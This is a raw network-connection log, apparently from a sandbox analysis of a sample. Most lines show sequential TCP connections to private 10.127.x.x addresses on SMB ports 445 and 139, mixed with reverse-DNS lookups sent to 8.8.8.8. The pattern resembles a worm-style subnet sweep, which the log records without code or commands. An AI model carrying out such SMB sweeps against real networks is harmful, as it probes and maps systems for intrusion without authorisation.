N/A 10.127.0.83:139 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.84:139 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.85:139 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.86:139 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.87:139 tcp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.88:139 tcp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.89:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.90:139 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.91:139 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.93:139 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.94:139 tcp
N/A 10.127.0.95:445 tcp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
N/A 10.127.0.95:139 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.29:445 tcp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.96:139 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.97:139 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.98:139 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.99:139 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.100:139 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.101:139 tcp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.102:139 tcp
N/A 10.127.0.33:445 tcp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
N/A 10.127.0.103:445 tcp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.103:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.104:139 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.105:139 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.106:139 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.107:139 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.108:139 tcp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.109:139 tcp
N/A 10.127.0.37:445 tcp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
N/A 10.127.0.37:139 tcp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.110:139 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.38:139 tcp
N/A 10.127.0.39:139 tcp
N/A 10.127.0.40:139 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.111:139 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.112:139 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.113:139 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.114:139 tcp
N/A 10.127.0.115:445 tcp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
N/A 10.127.0.115:139 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.41:445 tcp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
N/A 10.127.0.41:139 tcp
N/A 10.127.0.116:139 tcp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.117:139 tcp
N/A 10.127.0.42:139 tcp
N/A 10.127.0.43:139 tcp
N/A 10.127.0.44:139 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.118:139 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.119:139 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.120:139 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.121:139 tcp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.122:139 tcp
N/A 10.127.0.45:445 tcp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
N/A 10.127.0.123:445 tcp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
N/A 10.127.0.45:139 tcp
N/A 10.127.0.123:139 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.47:445 tcp
US 20.189.173.16:445 self.events.data.microsoft.com tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.46:139 tcp
N/A 10.127.0.47:139 tcp
US 20.189.173.16:139 self.events.data.microsoft.com tcp
N/A 10.127.0.124:139 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.125:139 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.126:139 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.127:139 tcp
N/A 10.127.0.128:445 tcp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
N/A 10.127.0.128:139 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.129:139 tcp
N/A 10.127.0.48:445 tcp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
N/A 10.127.0.48:139 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.130:139 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.49:139 tcp
N/A 10.127.0.50:139 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.131:139 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.132:139 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.133:139 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.134:139 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.135:445 tcp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
N/A 10.127.0.51:139 tcp
N/A 10.127.0.135:139 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.52:445 tcp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
N/A 10.127.0.52:139 tcp
N/A 10.127.0.136:139 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.53:139 tcp
N/A 10.127.0.54:139 tcp
N/A 10.127.0.137:139 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.138:139 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.139:139 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.140:139 tcp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.141:139 tcp
N/A 10.127.0.55:445 tcp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.55:139 tcp
N/A 10.127.0.142:139 tcp
N/A 10.127.0.56:445 tcp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.56:139 tcp
N/A 10.127.0.143:139 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.58:139 tcp
N/A 10.127.0.57:139 tcp
N/A 10.127.0.144:139 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.145:139 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.146:139 tcp
N/A 10.127.0.147:445 tcp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
N/A 10.127.0.147:139 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.148:139 tcp
N/A 10.127.0.59:139 tcp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.60:445 tcp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
N/A 10.127.0.149:139 tcp
N/A 10.127.0.60:139 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.150:139 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.62:139 tcp
N/A 10.127.0.61:139 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.151:139 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.152:139 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.153:139 tcp
N/A 10.127.0.154:445 tcp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
N/A 10.127.0.154:139 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.63:139 tcp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
N/A 10.127.0.155:139 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.156:445 tcp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
N/A 10.127.0.64:139 tcp
N/A 10.127.0.156:139 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.65:139 tcp
N/A 10.127.0.66:139 tcp
N/A 10.127.0.157:139 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.158:139 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.159:139 tcp
N/A 10.127.0.160:445 tcp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
N/A 10.127.0.160:139 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.161:139 tcp
N/A 10.127.0.67:139 tcp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.162:139 tcp
N/A 10.127.0.68:445 tcp
US 8.8.8.8:53 65.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.0.127.10.in-addr.arpa udp
N/A 10.127.0.68:139 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.163:139 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.69:139 tcp
N/A 10.127.0.70:139 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.164:139 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.165:139 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.166:139 tcp
N/A 10.127.0.167:445 tcp
US 8.8.8.8:53 67.0.127.10.in-addr.arpa udp
N/A 10.127.0.167:139 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.71:139 tcp
US 8.8.8.8:53 68.0.127.10.in-addr.arpa udp
N/A 10.127.0.168:139 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.72:445 tcp
US 8.8.8.8:53 69.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.0.127.10.in-addr.arpa udp
N/A 10.127.0.169:139 tcp
N/A 10.127.0.72:139 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.170:139 tcp
N/A 10.127.0.74:139 tcp
N/A 10.127.0.73:139 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.171:139 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.172:139 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.173:139 tcp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.174:139 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.75:139 tcp
US 8.8.8.8:53 72.0.127.10.in-addr.arpa udp
N/A 10.127.0.175:139 tcp
N/A 10.127.0.76:445 tcp
US 8.8.8.8:53 73.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.76:139 tcp
N/A 10.127.0.176:139 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.78:139 tcp
N/A 10.127.0.77:139 tcp
N/A 10.127.0.177:139 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.178:139 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.179:139 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.180:139 tcp
US 8.8.8.8:53 75.0.127.10.in-addr.arpa udp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.181:139 tcp
N/A 10.127.0.79:139 tcp
US 8.8.8.8:53 76.0.127.10.in-addr.arpa udp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.182:139 tcp
N/A 10.127.0.80:445 tcp
US 8.8.8.8:53 78.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.0.127.10.in-addr.arpa udp
N/A 10.127.0.80:139 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.183:139 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.82:139 tcp
N/A 10.127.0.81:139 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.184:139 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.185:139 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.186:139 tcp
N/A 10.127.0.187:445 tcp
US 8.8.8.8:53 79.0.127.10.in-addr.arpa udp
N/A 10.127.0.187:139 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.188:445 tcp
US 8.8.8.8:53 80.0.127.10.in-addr.arpa udp
N/A 10.127.0.83:139 tcp
N/A 10.127.0.188:139 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.84:445 tcp
US 8.8.8.8:53 81.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.0.127.10.in-addr.arpa udp
N/A 10.127.0.84:139 tcp
N/A 10.127.0.189:139 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.190:139 tcp
N/A 10.127.0.85:139 tcp
N/A 10.127.0.86:139 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.191:139 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.192:139 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.193:139 tcp
US 8.8.8.8:53 83.0.127.10.in-addr.arpa udp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.194:139 tcp
N/A 10.127.0.87:445 tcp
US 8.8.8.8:53 84.0.127.10.in-addr.arpa udp
N/A 10.127.0.87:139 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.195:139 tcp
N/A 10.127.0.88:445 tcp
US 8.8.8.8:53 85.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.0.127.10.in-addr.arpa udp
N/A 10.127.0.88:139 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.196:139 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.89:139 tcp
N/A 10.127.0.90:139 tcp
N/A 10.127.0.197:139 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.198:139 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.199:139 tcp
N/A 10.127.0.200:445 tcp
US 8.8.8.8:53 87.0.127.10.in-addr.arpa udp
N/A 10.127.0.200:139 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.201:139 tcp
N/A 10.127.0.91:139 tcp
US 8.8.8.8:53 88.0.127.10.in-addr.arpa udp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.202:139 tcp
US 8.8.8.8:53 89.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.0.127.10.in-addr.arpa udp
N/A 10.127.0.93:139 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.203:139 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.94:139 tcp
N/A 10.127.0.95:139 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.204:139 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.205:139 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.206:139 tcp
N/A 10.127.0.207:445 tcp
US 8.8.8.8:53 91.0.127.10.in-addr.arpa udp
N/A 10.127.0.207:139 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.208:445 tcp
US 8.8.8.8:53 93.0.127.10.in-addr.arpa udp
N/A 10.127.0.96:139 tcp
N/A 10.127.0.208:139 tcp
N/A 10.127.0.97:445 tcp
US 8.8.8.8:53 95.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.0.127.10.in-addr.arpa udp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.97:139 tcp
N/A 10.127.0.209:139 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.98:139 tcp
N/A 10.127.0.99:139 tcp
N/A 10.127.0.210:139 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.211:139 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.212:139 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.213:139 tcp
US 8.8.8.8:53 96.0.127.10.in-addr.arpa udp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.214:139 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.100:139 tcp
US 8.8.8.8:53 97.0.127.10.in-addr.arpa udp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.215:139 tcp
N/A 10.127.0.101:445 tcp
US 8.8.8.8:53 98.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.0.127.10.in-addr.arpa udp
N/A 10.127.0.101:139 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.216:139 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.102:139 tcp
N/A 10.127.0.103:139 tcp
N/A 10.127.0.217:139 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.218:139 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.219:139 tcp
N/A 10.127.0.220:445 tcp
US 8.8.8.8:53 100.0.127.10.in-addr.arpa udp
N/A 10.127.0.220:139 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.104:139 tcp
N/A 10.127.0.221:139 tcp
US 8.8.8.8:53 101.0.127.10.in-addr.arpa udp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.105:445 tcp
US 8.8.8.8:53 102.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.0.127.10.in-addr.arpa udp
N/A 10.127.0.222:139 tcp
N/A 10.127.0.105:139 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.223:139 tcp
N/A 10.127.0.106:139 tcp
N/A 10.127.0.107:139 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.224:139 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.225:139 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.226:139 tcp
US 8.8.8.8:53 104.0.127.10.in-addr.arpa udp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.227:139 tcp
N/A 10.127.0.108:445 tcp
US 8.8.8.8:53 105.0.127.10.in-addr.arpa udp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.108:139 tcp
N/A 10.127.0.228:139 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.109:445 tcp
US 8.8.8.8:53 106.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.0.127.10.in-addr.arpa udp
N/A 10.127.0.109:139 tcp
N/A 10.127.0.229:139 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.230:139 tcp
N/A 10.127.0.110:139 tcp
N/A 10.127.0.111:139 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.231:139 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.232:139 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.233:139 tcp
US 8.8.8.8:53 108.0.127.10.in-addr.arpa udp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.234:139 tcp
N/A 10.127.0.112:139 tcp
US 8.8.8.8:53 109.0.127.10.in-addr.arpa udp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.235:139 tcp
N/A 10.127.0.113:445 tcp
US 8.8.8.8:53 110.0.127.10.in-addr.arpa udp
N/A 10.127.0.236:445 tcp
US 8.8.8.8:53 111.0.127.10.in-addr.arpa udp
N/A 10.127.0.113:139 tcp
N/A 10.127.0.236:139 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.114:139 tcp
N/A 10.127.0.115:139 tcp
N/A 10.127.0.237:139 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.238:139 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.239:139 tcp
N/A 10.127.0.240:445 tcp
US 8.8.8.8:53 112.0.127.10.in-addr.arpa udp
N/A 10.127.0.240:139 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.116:445 tcp
US 8.8.8.8:53 113.0.127.10.in-addr.arpa udp
N/A 10.127.0.116:139 tcp
N/A 10.127.0.241:139 tcp
N/A 10.127.0.242:445 tcp
US 8.8.8.8:53 114.0.127.10.in-addr.arpa udp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.242:139 tcp
US 8.8.8.8:53 115.0.127.10.in-addr.arpa udp
N/A 10.127.0.117:139 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.243:139 tcp
N/A 10.127.0.118:139 tcp
N/A 10.127.0.119:139 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.244:139 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.245:139 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.246:139 tcp
US 8.8.8.8:53 116.0.127.10.in-addr.arpa udp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.247:139 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.248:445 tcp
US 8.8.8.8:53 117.0.127.10.in-addr.arpa udp
N/A 10.127.0.120:139 tcp
N/A 10.127.0.248:139 tcp
N/A 10.127.0.249:445 tcp
US 8.8.8.8:53 119.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.0.127.10.in-addr.arpa udp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.121:139 tcp
N/A 10.127.0.249:139 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.122:139 tcp
N/A 10.127.0.123:139 tcp
N/A 10.127.0.250:139 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.251:139 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.252:139 tcp
N/A 10.127.0.253:445 tcp
US 8.8.8.8:53 120.0.127.10.in-addr.arpa udp
N/A 10.127.0.253:139 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.254:139 tcp
US 8.8.8.8:53 121.0.127.10.in-addr.arpa udp
N/A 10.127.0.124:139 tcp
N/A 10.127.0.255:445 tcp
N/A 10.127.0.255:139 tcp
N/A 10.127.0.125:445 tcp
US 8.8.8.8:53 122.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.0.127.10.in-addr.arpa udp
N/A 10.127.1.0:445 tcp
N/A 10.127.0.125:139 tcp
N/A 10.127.1.0:139 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.1.1:445 tcp
N/A 10.127.0.126:139 tcp
N/A 10.127.0.127:139 tcp
N/A 10.127.1.1:139 tcp
N/A 10.127.1.2:445 tcp
N/A 10.127.1.2:139 tcp
N/A 10.127.1.3:445 tcp
N/A 10.127.1.3:139 tcp
N/A 10.127.1.4:445 tcp
US 8.8.8.8:53 124.0.127.10.in-addr.arpa udp
N/A 10.127.1.4:139 tcp
N/A 10.127.1.5:445 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.128:139 tcp
US 8.8.8.8:53 125.0.127.10.in-addr.arpa udp
N/A 10.127.1.5:139 tcp
N/A 10.127.1.6:445 tcp
N/A 10.127.0.129:445 tcp
US 8.8.8.8:53 126.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.0.127.10.in-addr.arpa udp
N/A 10.127.1.6:139 tcp
N/A 10.127.0.129:139 tcp
N/A 10.127.1.7:445 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.1.7:139 tcp
N/A 10.127.0.130:139 tcp
N/A 10.127.0.131:139 tcp
N/A 10.127.1.8:445 tcp
N/A 10.127.1.8:139 tcp
N/A 10.127.1.9:445 tcp
N/A 10.127.1.9:139 tcp
N/A 10.127.1.10:445 tcp
N/A 10.127.1.10:139 tcp
US 8.8.8.8:53 128.0.127.10.in-addr.arpa udp
N/A 10.127.1.11:445 tcp
N/A 10.127.1.11:139 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.1.12:445 tcp
N/A 10.127.0.132:139 tcp
US 8.8.8.8:53 129.0.127.10.in-addr.arpa udp
N/A 10.127.1.12:139 tcp
US 8.8.8.8:53 130.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.0.127.10.in-addr.arpa udp
N/A 10.127.1.13:445 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.133:139 tcp
N/A 10.127.1.13:139 tcp
N/A 10.127.1.14:445 tcp
N/A 10.127.1.14:139 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.0.134:139 tcp
N/A 10.127.0.135:139 tcp
N/A 10.127.1.15:445 tcp
N/A 10.127.1.15:139 tcp
N/A 10.127.1.16:445 tcp
N/A 10.127.1.16:139 tcp
N/A 10.127.1.17:445 tcp
N/A 10.127.1.17:139 tcp
US 8.8.8.8:53 132.0.127.10.in-addr.arpa udp
N/A 10.127.1.18:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.1.18:139 tcp
N/A 10.127.0.136:139 tcp
US 8.8.8.8:53 133.0.127.10.in-addr.arpa udp
N/A 10.127.1.19:445 tcp
N/A 10.127.1.19:139 tcp
N/A 10.127.0.137:445 tcp
US 8.8.8.8:53 135.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.0.127.10.in-addr.arpa udp
N/A 10.127.0.137:139 tcp
N/A 10.127.1.20:445 tcp
N/A 10.127.1.20:139 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.138:139 tcp
N/A 10.127.0.139:139 tcp
N/A 10.127.1.21:445 tcp
N/A 10.127.1.21:139 tcp
N/A 10.127.1.22:445 tcp
N/A 10.127.1.22:139 tcp
N/A 10.127.1.23:445 tcp
N/A 10.127.1.23:139 tcp
N/A 10.127.1.24:445 tcp
US 8.8.8.8:53 136.0.127.10.in-addr.arpa udp
N/A 10.127.1.24:139 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.1.25:445 tcp
US 8.8.8.8:53 137.0.127.10.in-addr.arpa udp
N/A 10.127.0.140:139 tcp
N/A 10.127.1.25:139 tcp
N/A 10.127.1.26:445 tcp
N/A 10.127.0.141:445 tcp
US 8.8.8.8:53 138.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.0.127.10.in-addr.arpa udp
